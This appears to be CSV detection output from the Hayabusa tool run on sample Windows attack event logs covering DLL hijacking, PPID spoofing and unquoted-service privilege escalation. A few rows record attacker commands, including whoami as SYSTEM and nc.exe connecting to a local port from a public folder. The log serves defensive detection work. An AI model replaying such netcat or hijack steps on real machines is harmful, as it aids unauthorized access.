2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
